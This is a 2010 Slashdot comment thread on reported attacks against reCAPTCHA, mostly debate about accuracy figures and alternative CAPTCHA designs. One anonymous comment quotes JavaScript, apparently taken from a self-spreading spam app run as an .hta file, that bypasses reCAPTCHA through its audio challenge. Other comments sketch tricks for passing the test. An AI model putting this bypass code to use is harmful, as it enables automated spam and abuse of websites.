And that, timothy, is the difference between a dork and a geek. You failed the Twit Filter at reCAPTCHA.

So many better ways than recaptcha by gurps_npc · 2010-08-05 09:38 · Score: 0

The whole point of these tests is to prove you are human by solving a difficult imaging (or audio) identification problem.

There is ZERO reason to use worthless tests like these as opposed to using real identification. That is, instead of using a computer-generated difficult test, use actual pictures of actual 'difficult text' that an OCR agent failed to identify. Each person is given one already tested sample and one unknown sample. If you get the already tested sample right, then your answer is accepted as 'probably' correct for the unknown sample. Three matching probably-correct answers = confirmed as correct, and the unknown sample moves to the "already tested" section.

There is more than enough written and audio samples that the world would love to see OCR'ed. We don't have to generate fake ones.
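
For what it's worth, the bookkeeping described above fits in a few lines. This is only a sketch of the scheme as stated in this comment, not anyone's actual server code: `WordPool`, `submit`, `VOTES_NEEDED` and the image ids are made-up names, and case-insensitive exact matching is an assumption.

```python
from collections import Counter

VOTES_NEEDED = 3  # "three matching probably-correct answers" from the comment


class WordPool:
    """Hypothetical store of already tested and still unknown word images."""

    def __init__(self, known):
        self.known = dict(known)  # image id -> confirmed text
        self.votes = {}           # image id -> Counter of proposed texts

    def submit(self, known_id, known_answer, unknown_id, unknown_answer):
        """Return True if the user passes; record a vote for the unknown word."""
        if known_answer.strip().lower() != self.known[known_id].lower():
            return False  # control word wrong: ignore the other answer too
        guess = unknown_answer.strip().lower()
        tally = self.votes.setdefault(unknown_id, Counter())
        tally[guess] += 1
        if tally[guess] >= VOTES_NEEDED:
            # Enough matching answers: move the word to the "already tested" set.
            self.known[unknown_id] = guess
            del self.votes[unknown_id]
        return True
```

Note that the user passes on the control word alone; the answer for the unknown word only ever counts as a vote.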

--
excitingthingstodo.blogspot.com

Re:So many better ways than recaptcha by sugarmotor · 2010-08-05 09:45 · Score: 1

You wrote, "There is more than enough written and audio samples that the world would love to see OCR'ed." -- Where do you get those?

--
http://stephan.sugarmotor.org
Re:So many better ways than recaptcha by Anonymous Coward · 2010-08-05 09:46 · Score: 0

I don't think you understand what reCAPTCHA does...
Re:So many better ways than recaptcha by Anonymous Coward · 2010-08-05 09:47 · Score: 0

You do realize that reCAPTCHA does exactly what you described?
Re:So many better ways than recaptcha by JesseMcDonald · 2010-08-05 09:49 · Score: 3, Informative

There is ZERO reason to use worthless tests like these as opposed to using real identification. That is, instead of using a computer-generated difficult test, use actual pictures of actual 'difficult text' that an OCR agent failed to identify. Each person is given one already tested sample and one unknown sample. If you get the already tested sample right, then your answer is accepted as 'probably' correct for the unknown sample.
Congratulations, you've just described ReCAPTCHA! This is exactly how the current system works.

--
"The state is that great fiction by which everyone tries to live at the expense of everyone else." - Bastiat
Re:So many better ways than recaptcha by Lunix+Nutcase · 2010-08-05 10:35 · Score: 1

In other words.... use reCAPTCHA?
Re:So many better ways than recaptcha by SmlFreshwaterBuffalo · 2010-08-05 14:59 · Score: 1

...and how in the hell do you OCR an audio sample???
Re:So many better ways than recaptcha by neminem · 2010-08-06 08:40 · Score: 1

Step 1: open it in notepad...

Is this related? by Khyber · 2010-08-05 09:48 · Score: 4, Interesting

Anybody that pays attention to 4chan recently knows they had to implement captcha due to a massive spamflood of infected morons. recaptcha got busted thanks to someone in /g/ who leaked the vulnerability in the sound system for reCAPTCHA, and the whole site was again inundated with spam, though not to the same degree as in the original spam attack.

--
Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.

Re:Is this related? by Dice · 2010-08-05 10:36 · Score: 1

The audio vulnerability is unrelated, and more effective than the algorithm presented in TFA.
Re:Is this related? by Monkeedude1212 · 2010-08-05 11:26 · Score: 1

Anybody that pays attention to 4chan
What, all 200 of them?
Re:Is this related? by Anonymous Coward · 2010-08-05 12:10 · Score: 0

When Anonymous manipulated the Time Top 100 poll results to spell "Marble cake also the game" out of the first letters of the first names of the top ranked people making Moot the #1 ranked person in the poll, they figured out that they only had to type in the "real looking" word to pass reCAPTCHA.
You can do a search for "moot wins, Time Inc. loses" to find the blog entry containing a link to the full set of rules they used for deciding which word to enter in reCAPTCHA.
It sounds like reCAPTCHA generates one word that sort of looks like it came from a book instead of using an image of a word from a previously solved CAPTCHA.
To approximate a person picking the "real" word, a program could try to look up both scanned words in a dictionary. If only one of them was found, just enter that one in reCAPTCHA.
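
A minimal sketch of that lookup, in Python. The name `pick_control_word` and the tiny word set are hypothetical; the OCR step that would produce the two guesses is not shown, and whether the "real looking" word is actually the checked one is this comment's theory, not something confirmed here.

```python
def pick_control_word(word_a, word_b, dictionary):
    """Return the one guess found in the dictionary, or None if inconclusive."""
    in_a = word_a.lower() in dictionary
    in_b = word_b.lower() in dictionary
    if in_a != in_b:          # exactly one of the two looks like a real word
        return word_a if in_a else word_b
    return None               # both or neither found: the heuristic cannot decide


# Stand-in for a real word list (assumption for illustration only).
DICTIONARY = {"ware", "readiness", "zests", "the"}
```

When both words (or neither) are in the dictionary, the function gives up rather than guessing, which is the case the comment leaves open.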
Re:Is this related? by Anonymous Coward · 2010-08-05 14:00 · Score: 0

4chan is about 1% as relevant as everyone who thinks 4chan is relevant thinks.
Re:Is this related? by MostAwesomeDude · 2010-08-05 17:53 · Score: 1

I was going to note this. It's to the point where 4chan is actively exhausting the reCAPTCHA dictionaries, causing interesting words to show up. Half the time, one of the words is some kind of kanji or untypeable symbol now.

--
~ C.
Re:Is this related? by Anonymous Coward · 2010-08-05 20:50 · Score: 0

As in all things technology related, pornography related activities tend to advance the state of the art. In this case 4chan, that incestuous hive of scum and villainy, will become a proving ground for various autonomous visual/audio recognition systems now that the spammers have to up their game. There are some smart Polish and Ukrainian programmers who are going to give them trouble...

How is this 30% accurate??? by mwvdlee · 2010-08-05 10:02 · Score: 3, Insightful

When it is claimed to be 30% accurate, I'd expect some 30% of all captchas to be correctly guessed. Watching the video, I noticed the algorithm gives itself 30-40% scores for getting just one of the two words right or sometimes even for getting the right length and a few correct letters. Didn't watch it to the end, but in the few minutes I watched, ZERO entire captchas were solved. So that's ZERO% accurate in my book. For instance, actual captcha text "ware readiness", guessed captcha "votarry rehabbed", reported accuracy 38.24%... how the hell is that over 38% accurate? If you had that level of accuracy when trying to get past a captcha (which is pretty much the definition of it being vulnerable, right?), you wouldn't get past a single captcha. It's 30% accurate if it correctly guesses about 3 out of every 10 captchas, not if it fails every single captcha.

--
Slashdot social media options: AIM, ICQ, Yahoo, Jabber and Mobile Text. Why no MySpace?

Re:How is this 30% accurate??? by Timmmm · 2010-08-05 11:11 · Score: 1

You only need to get one (specific) word right.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 12:58 · Score: 0

You must not be familiar with reCAPTCHA. Only one of the words (usually the one that's easier to read) is (or can be) actually checked. The other is a word that couldn't be identified with OCR and reCAPTCHA is exploiting the (presumably) human user to read it. Next time you encounter a reCAPTCHA, you should be able to only enter the clearer word correctly and enter whatever you please for the more garbled word. And the "accuracy" in this case is a measure of how often it can bypass the CAPTCHA, which is roughly 30% of the time. If this technique could decode both words with 30% accuracy, then it would probably make it the best OCR application in the world, being able to decode already difficult cases that have also been deliberately distorted.
Re:How is this 30% accurate??? by wdavies · 2010-08-05 13:05 · Score: 1

mod this up. I hadn't gotten the implication of the exploit either until now.
Re:How is this 30% accurate??? by afaik_ianal · 2010-08-05 14:20 · Score: 1

As a number of others have stated, the reCAPTCHA server only knows the answer to one of the words it's giving you. You only need to get the "easy" one right to be passed as a human. Getting the "hard" word right makes no difference in terms of passing the test.
If this were getting 30% accuracy on the hard words, then that would be *real* news.
I suspect this is getting slightly lower success than they're reporting, as that 38% figure is assuming they're only getting the easy words right, but in actual fact they're bound to get only the hard one right every now and then.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 14:39 · Score: 0

You are not paying close enough attention. That rating was the accuracy being tracked overall, not for that specific image. It only has to get one word of the two right, and it can be a character off. The percentage claimed reflects how often it will defeat recaptcha autonomously.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 14:48 · Score: 0

30% is pretty significant even if it's only one word. remember that this is a landmark for an algorithm that's not supposed to work.
I'm pretty certain that this SHOULD be an NP-complete problem.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 15:21 · Score: 0

One known and one unknown word is used. In order to pass the test, you need only get the known word correct. The unknown word is how they keep the whole thing profitable, translation service and all that.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 17:09 · Score: 0

38.24% is 13/34 representing the percentage of correct single word guesses. The one before the 38.24% is 13/33 = 39.39% correct.
Take a look at number 7 instead.
cap actual: zests the
result: zesty very
But it still says it got a single word correct. 1/6 = 16.67% becomes 2/7 = 28.57%.
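
The arithmetic is easy to check. A short sketch that recomputes the running figure, assuming (as the numbers above suggest) that the counter is simply "captchas with a word counted as correct" divided by "captchas attempted so far"; the function name is made up.

```python
def running_accuracy(results):
    """Yield the cumulative hit percentage after each captcha attempt."""
    hits = 0
    for attempts, hit in enumerate(results, start=1):
        hits += hit  # True counts as 1, False as 0
        yield round(100 * hits / attempts, 2)


# One hit in the first six attempts, then attempt 7 is scored as a hit.
first_seven = [True, False, False, False, False, False, True]
print(list(running_accuracy(first_seven))[-2:])  # 1/6, then 2/7
```

Under that assumption the displayed percentage is a running average over all attempts, so it says nothing about how close the guess for the current image was.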
Re:How is this 30% accurate??? by yuhong · 2010-08-05 17:44 · Score: 1

That raises a question. If most of the time when this succeeds they only get the easy word right, how would that pollute the digitization of the text?
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-06 02:44 · Score: 0

FFS please READ how recaptcha works. It's explained on their website and it's been discussed here.

Impossible captcha's by aegis3d · 2010-08-05 10:32 · Score: 0

Talking about 4chan, there's currently a hilarious thread about impossible captchas: http://boards.4chan.org/r9k/res/10509296 (note, it is of course 4chan, be careful there, although this is r9k, not the worst of boards.. )

On the bright side by MadGeek007 · 2010-08-05 10:49 · Score: 1

Maybe this hack can be used to improve book scanning.

off topic by Anonymous Coward · 2010-08-05 11:54 · Score: 0

where's the /. story on wikileaks "insurance" file? come on come on......

Re:Bad Hacking vs Penetration Testing by billstewart · 2010-08-05 12:14 · Score: 1

If reCAPTCHA's too easily breakable, then Bad Guys will figure out how, and will start exploiting sites that use reCAPTCHA for protection.

So we need to know how vulnerable it is, and the reCAPTCHA folks need to figure out how to fix it. It's an arms race, always has been, probably always will be.

--

Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks

%30 seems about right by dilvish_the_damned · 2010-08-05 12:19 · Score: 1

since thats about the accuracy of a human

--
I think you underestimate just how much I just dont care.

New Human Verification Scheme by BlueMonk · 2010-08-05 12:39 · Score: 3, Interesting

Seeing this article gave me an idea to come up with a new human verification process. I created a C# program in about an hour that loads images from Google images based on searching for 3 of 2000+ nouns. It shows 3 examples of each noun and asks the user to pick the correct noun from a list of 6. This program is just a proof of concept of course. Could this become useful? (Binary and source code included.)
http://enigmadream.com/misc/HumanVerification.zip

Re:New Human Verification Scheme by afaik_ianal · 2010-08-05 14:37 · Score: 1

Nice idea, but I can break it trivially with my Android phone: Open "goggles", point at screen, click, and "Similar Images" gives me the answer (or a multi-word answer containing the answer you're looking for).
I have to keep my hand really still as I take the shots though, so perhaps a bit of image distortion would be enough to work around that.
Re:New Human Verification Scheme by Anonymous Coward · 2010-08-05 15:09 · Score: 0

That's Excellent.
Re:New Human Verification Scheme by KahabutDieDrake · 2010-08-05 15:54 · Score: 2, Interesting

If you used something that wasn't a public resource based around text strings, then yes.

Better still... show a bank of images, ask which one has a happy little girl in it. (all images contain a girl, only one obviously happy). Randomize the backend with a cryptographic routine (so the file names don't give anything away) and you are set for a while. Computers are terrible at such things, people are pretty good at it.
Re:New Human Verification Scheme by Anonymous Coward · 2010-08-05 19:09 · Score: 0

Multiple choice doesn't work for captcha. Say you had 9 choices... you are guaranteed 11% pass rate just from guessing. That's not nearly good enough. A spammer would expect to beat your system after 5 tries. No sweat for an automated system.
Re:New Human Verification Scheme by BlueMonk · 2010-08-05 23:08 · Score: 1

It would be hard to come up with a bank of images as large as Google images. It has to be quite large because otherwise someone could create a database of picture checksums unless some sort of distortion was applied.
I don't specifically see how detecting a happy girl in a picture is better than picking a description of a picture. Personally I would think picking a description that looks like a good categorization of 3 images (as the program does) is even more difficult to fake. It requires more than a single ability; a large vocabulary of words and experience. Maybe your idea is better in that it's easier for people with a limited vocabulary.
Re:New Human Verification Scheme by BlueMonk · 2010-08-05 23:11 · Score: 1

You didn't look at the program or read my post carefully enough. You have to do this 3 times in a row, which yields less than 1% probability of randomly guessing a correct answer. With a 1 hour delay after 3 bad attempts, this would significantly limit automated passage through the system.
Re:New Human Verification Scheme by BlueMonk · 2010-08-06 00:17 · Score: 1

Interesting. I'm not familiar with that app/feature (I don't have a smart phone). It gives you a list of words along with the similar pictures you say? I wonder what the actual probability of the result containing the same word as the test is. The actual test shows 3 pictures and it's up to the human to pick the common element out of them. I wonder if the android app could/would find the same word in 3 lists (or 2 of the 3).
Yes, distortion is another thing that occurred to me that would probably be easy to add if it would introduce some degree of additional challenge to the automated systems without hindering real humans too much.

Let's hope they hit 100% by drinkypoo · 2010-08-05 13:04 · Score: 2, Interesting

Then we can just put reCAPTCHA on all pages being used for spam, and get transcription services for free.

--
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"

Re:Let's hope they hit 100% by Anonymous Coward · 2010-08-05 14:51 · Score: -1, Troll

Hey drinkypoo,
Nothing to do with your post, but I have five modpoints. I am tired of you vomiting ten comments in a thread before I can even read the summary. Be prepared to lose a bunch of karma, you stupid pencilneck nerd.
Re:Let's hope they hit 100% by cmdrwhitewolf · 2010-08-09 03:05 · Score: 1

Bravo! I haven't seen such a display of flaming stupidity in a while. So, you disagree with Drinkypoo's viewpoint and that he can express it before you can, so you decide to devolve into name calling. Did anyone ever tell you that you might just be a bloody slow reader?
Well, at least now we have proof that the mod point system is totally indiscriminate, because it's giving out points to individuals who probably don't deserve them in the first place...

--
[Now, I'm off to lift my le... Um, visit... at another place.]

Don't Worry by flimflammer · 2010-08-05 13:11 · Score: 1

reCAPTCHA is already on the road to beating this. When your images are on the verge of being discovered algorithmically, use Hebrew.

Zap colors by Anonymous Coward · 2010-08-05 14:06 · Score: 0

Bookmarklets for Zapping Annoyances

https://www.squarefree.com/bookmarklets/zap.html

Try the "zap colors" bookmarklet. There are a few other useful bookmarklets on that page too.

Captcha by Phat_Tony · 2010-08-05 14:26 · Score: 1

When OCR gets so good that recaptcha becomes pointless, my idea for the next step of harder-for-AI captchas is to stop using line art and start using gradients. That is, currently, they use text, which is line art, and then warp it, chop it up, and run miscellaneous clutter through it. It's getting harder and harder for people to read, and machines are still catching up.

I propose that if you start with a photograph, make a selection that's block text, feather the edges, then shift the colors in the selection (hue, saturation, inversion, remapping, whatever), it's going to be easier for humans and harder for computers than some of the stuff we've got now. But generating it can be automated just as easily; I scripted Photoshop to make these in a few minutes.

Here's an example

--
Can anyone tell me how to set my sig on Slashdot?

Re:Captcha by sugarmotor · 2010-08-05 16:33 · Score: 1

Sounds like a good idea. You still have to swap out the background photo though.
-> Bicycle ride captcha, where photos are taken from the video of the ride

--
http://stephan.sugarmotor.org
Re:Captcha by sugarmotor · 2010-08-05 17:33 · Score: 1

Actually "Type this text" is not that easy to read -- the usual problem with CAPTCHA development is finding that balance; when you can't use the same picture over and over again, it'll be difficult, I think.
How do you like the one at http://stephansmap.org/sign_up

--
http://stephan.sugarmotor.org
Re:Captcha by Anonymous Coward · 2010-08-06 04:07 · Score: 0

You'd better use images that are not available online for this. Otherwise, the attacker can just throw them at Tineye, subtract a clean copy and get to work as usual. If the same image is used more than once, a similar problem occurs.

Multiple choice doesn't work for CAPTCHAs by mrnobo1024 · 2010-08-05 15:38 · Score: 2, Insightful

The spammers can just choose a random option until they get in. All that will do is slow them down a bit.

Re:Multiple choice doesn't work for CAPTCHAs by BlueMonk · 2010-08-05 23:02 · Score: 1

That's why you have to pick 1 of 6 choices 3 times in a row correctly. The probability of getting that right with completely random guesses is less than 1%. And if you combine it with a 1 hour delay after 3 bad attempts, that should be a significant impedance.
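
To put numbers on that, a quick sketch. It assumes every guess is uniformly random and independent, and that "3 bad attempts" means three full tries at the 3-question test; both function names are made up.

```python
def blind_pass_chance(options, rounds):
    """Chance of picking the right option in every round by pure guessing."""
    return (1 / options) ** rounds


def chance_within(attempts, per_attempt):
    """Chance that at least one of several independent attempts succeeds."""
    return 1 - (1 - per_attempt) ** attempts


one_try = blind_pass_chance(options=6, rounds=3)   # 1/216, under half a percent
per_hour = chance_within(attempts=3, per_attempt=one_try)
print(f"{one_try:.4%} per try, {per_hour:.4%} per hour from one address")
```

The per-hour figure only holds per address that the delay applies to; it says nothing about an attacker who can spread attempts over many addresses.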
Re:Multiple choice doesn't work for CAPTCHAs by Arlet · 2010-08-06 01:53 · Score: 1

Forced delays become meaningless if the attacker has access to a large botnet
Re:Multiple choice doesn't work for CAPTCHAs by BlueMonk · 2010-08-06 11:37 · Score: 1

It's just one ingredient. Better to have a delay for attackers that don't than not to have one. The less-than-1% chance of success per attempt is still better than the old method, right?
Re:Multiple choice doesn't work for CAPTCHAs by Anonymous Coward · 2010-08-18 02:11 · Score: 0

Multiple choice (multiple answer) actually works pretty well for CAPTCHAs. This is pretty similar to the kitten-based CAPTCHAs: http://thepcspy.com/kittenauth/ N options give you 2^N possible selections (you can subtract 2, since you may want to exclude all-empty and all-selected).
If you display 12 images and ask the user to pick all the kittens (kitten detection algorithm ahoy) the bot has to try up to 4094 possibilities. Add an IP check limiting to 10 tries per 30 minutes, blocking after 30 tries. Each image you add doubles the number of possibilities.
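
A small sketch of that count, assuming the bot has no kitten detector at all, never repeats a selection, and that the correct selection stays the same across tries (a site that reshuffles images each time would change the math). Function names are made up.

```python
def selections(n_images):
    """Number of possible selections, excluding 'none' and 'all'."""
    return 2 ** n_images - 2


def chance_before_block(n_images, tries_allowed):
    """Chance a blind bot hits the right selection before being blocked."""
    return min(1.0, tries_allowed / selections(n_images))


print(selections(12))                 # 4094
print(chance_before_block(12, 30))    # 30 distinct guesses out of 4094
```

With the 30-try block suggested above, that works out to well under 1% per blocked address.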

Re:The Goggles WORK! by JambisJubilee · 2010-08-05 18:00 · Score: 1

Try taking a picture of the CAPTCHA with your phone using the google goggles app. It works... remarkably well!

Captcha's are so yesterday... by Anonymous Coward · 2010-08-05 21:45 · Score: 0

Think of a blind person using an image captcha. Ever tried understanding the audio versions!?

Best alternative... http://textcaptcha.com/

(actually, the audio one on here is not bad)

MOD Parent down by Anonymous Coward · 2010-08-05 23:53 · Score: 0

Mod parent down.

RTFA.

WALOC by Anonymous Coward · 2010-08-06 00:03 · Score: 0

Note: the PowerPoint presentation linked opens fine in OpenOffice, and the video speaks for itself.

That's OpenOffice.ORG for you and no IT DOES NOT OPEN FINE. Text is bleeding through all over the slides. And there's no video, just an "swf" file that can't be opened.

Have to know which is known and which is unknown by Sockatume · 2010-08-06 01:21 · Score: 1

If you get one of the answers right, and it's not the known, then you're still stuck, though. So its success rate is closer to 18%: it identifies one word correctly 35% of the time, and on 50% of those occasions, it's the known word.
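
Spelled out as a calculation, taking the 35% and 50% figures above at face value and treating the two events as independent (an assumption; the function name is made up):

```python
def pass_rate(p_one_word_right, p_it_is_the_known_word):
    """Chance that the single correctly read word is also the checked one."""
    return p_one_word_right * p_it_is_the_known_word


print(f"{pass_rate(0.35, 0.50):.1%}")  # 17.5%, i.e. "closer to 18%"
```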

--
No kidding!!! What do you say at this point?

Code here by Anonymous Coward · 2010-08-06 04:57 · Score: 0

Here's the code:

There's an app spreading around and posting itself around /b/. The interesting thing about it is that the app presents itself as an image requesting itself to be pasted to mspaint, saved as *.hta and run, then starts posting itself again. Somehow the code survives image compression intact.

The recaptcha breaking code is:

// CAPTCHA
var threadurl = "http://boards.4chan.org/" + dir[board] + "/";
if (thread != "") threadurl += "res/" + thread;
get("http://www.google.com/recaptcha/api/challenge?k=6Ldp2bsSAAAAAAJ5uyx_lx34lJeEpTLVkP5k04qc", 1);
var challenge1 = request.responseText.match(/challenge : '([^']+)'/)[1];
get("http://www.google.com/recaptcha/api/reload?c=" + challenge1 + "&k=6Ldp2bsSAAAAAAJ5uyx_lx34lJeEpTLVkP5k04qc&reason=a&type=audio&lang=en&new_audio_default=1", 1);
var challenge2 = request.responseText.match(/finish_reload\('([^']+)'/)[1];
var nwords = 10 + Math.floor(3*Math.random());
response = "";
for (var i = 0; i < nwords; i++) {
if (i > 0) response += " ";
response += randomchoice(wordlist);
}

There's a quite large random list of common words in English.

I always thought of a similar attack, since I once tried the sound re-captcha, couldn't understand a thing on the audio and still was granted access.

correct number: 2.6% by Anonymous Coward · 2010-08-06 10:48 · Score: 0

I guess that "accuracy" is calculated by how many letters were OCRd correctly. Sorry, that measure might make sense for playing hangman, but not for solving a captcha. It's pass or fail.

According to their Powerpoint,

2.6% of the time both words were solved for a guaranteed defeat.

So taking into account that you only need to recognize one word correctly but don't know which one, the bot would have to try about 30 times before getting it right. So it would get banned all the time.

Slashdot Mirror

251 comments